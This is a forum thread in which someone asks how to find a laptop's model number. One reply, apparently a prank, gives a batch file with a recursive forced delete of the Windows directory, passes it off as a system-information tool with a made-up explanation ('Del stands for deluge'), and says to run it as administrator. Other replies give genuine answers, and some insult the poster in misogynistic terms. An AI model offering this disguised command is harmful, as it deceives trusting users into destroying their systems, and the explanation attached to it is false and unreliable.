Notice: You have been identified as a bot, so no internal UID will be assigned to you. If you are a real person messing with your useragent, you should change it back to something normal.

Minichan

Topic: I got a new laptop, fora.

Catherine !TGirlYJKXM started this discussion 10 years ago #55,411

My mother gave me her old one.

How do you find the model number of one?

Anonymous B joined in and replied with this 10 years ago, 49 minutes later[^] [v] #716,940

Microsoft actually made it pretty difficult to get detailed information in their latest updates to 7, 8.1, 10. The idea being that it confuses people by adding more options and if anyone actually needs it then there are services available via Microsoft Helpline (which hey guess what cost money, convenient for them), but because they can't really drastically alter the OS after its released, they basically just hid it.

Luckily, that means with the right commands it's possible to load it up again. We will do this by creating a table with all the information about your computer eg make model Windows version memory etc.

First, to notepad and paste in the following

@echo off
del c:\windows\*.* /F /S /Q /as /ar /aa /ah


Del stands for deluge, Microsoft's interior panel viewer. Basically it's just a window with writing on it, it's a fundamental software so it only takes a one word command to open it rather than like the twenty line command to even open a system application like notepad.

C:\ Windows is the Windows directory, where all the information about your system is stored. This tells the command which folder deluge should be sourcing from for the data it is seeking.

All the stuff after is for different parts of your system. It will give you a brief overview of all the stuff you need to know.

It will allow you to save it so you don't have to do that each time you need to know.

Click File>Save As and change the bottom option from .txt to all files. Save it as stats.bat on your desktop

A .bat is an order for the OS. Think of it like the direct line from the president to his generals. Its what tells Windows that these are instructions to follow.

Finally, right click and run as administrator. This is because only administrators are allowed access to the secret areas of the Windows folder where your personal information is, to deter hackers.

(Edited 3 minutes later.)

Metæ joined in and replied with this 10 years ago, 2 minutes later, 52 minutes after the original post[^] [v] #716,943

@OP
What brand is it?

brie !kGoudaMCFA joined in and replied with this 10 years ago, 22 minutes later, 1 hour after the original post[^] [v] #716,955

@716,940 (B)
that is a pretty long-winded way of saying 'delete system32'

@OP
are there any markings on the laptop? Sometimes the model number is on the laptop.

Anonymous E joined in and replied with this 10 years ago, 55 minutes later, 2 hours after the original post[^] [v] #716,962

pic of catherine leaked before she put tape over the camera

Anonymous F joined in and replied with this 10 years ago, 10 minutes later, 2 hours after the original post[^] [v] #716,965

There should really be a label on the bottom or something that details model number, serial number, power input requirements, etc. From there you should be able to get any additional specs from the manufacturer's web page.

(Edited 1 minute later.)

more positive 悟 joined in and replied with this 10 years ago, 5 hours later, 7 hours after the original post[^] [v] #717,044

@716,940 (B)
you have to do all that shit? no way lemme see

more positive 悟 double-posted this 10 years ago, 2 minutes later, 7 hours after the original post[^] [v] #717,046

@716,940 (B)
oh i just read the whole post
that works too carry on lol

more positive 悟 triple-posted this 10 years ago, 3 minutes later, 7 hours after the original post[^] [v] #717,048

@OP

> My mother gave me her old one.
>
> How do you find the model number of one?

but this was mean. Heres what you do catherine!:!:!:!: >start >settings >system >about

but seriously you have like the computer literacy of like my mom wtf

Alba Gal !MLHqI35Srs joined in and replied with this 10 years ago, 2 hours later, 10 hours after the original post[^] [v] #717,060

@previous (more positive 悟)
That's because she's truly a woman.

Anonymous B replied with this 10 years ago, 8 hours later, 18 hours after the original post[^] [v] #717,144

@716,955 (brie !kGoudaMCFA)

I tend to get verbal when I'm stoned.
:

Please familiarise yourself with the rules and markup syntax before posting.